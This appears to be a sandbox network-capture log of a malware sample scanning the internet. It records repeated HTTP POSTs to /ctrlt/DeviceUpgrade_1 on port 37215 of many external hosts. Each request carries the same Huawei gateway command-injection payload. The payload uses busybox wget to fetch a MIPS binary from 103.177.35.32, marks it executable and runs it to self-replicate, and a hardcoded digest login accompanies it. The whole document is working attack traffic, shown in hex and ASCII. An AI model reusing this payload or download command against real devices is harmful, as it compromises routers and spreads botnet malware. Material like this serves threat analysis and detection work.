                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2593192.168.2.2347726157.236.236.4737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628119946 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2594192.168.2.233563041.31.51.9737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628148079 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2595192.168.2.2346816110.242.212.14237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628148079 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2596192.168.2.235625241.211.214.21637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628151894 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2597192.168.2.235256441.230.202.20937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628153086 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2598192.168.2.2344316157.183.80.18837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628293991 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2599192.168.2.234672439.85.122.18137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628302097 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2600192.168.2.2335452121.134.180.1337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628313065 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2601192.168.2.2334570104.239.137.10637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628364086 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2602192.168.2.2336818181.253.108.337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628365993 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
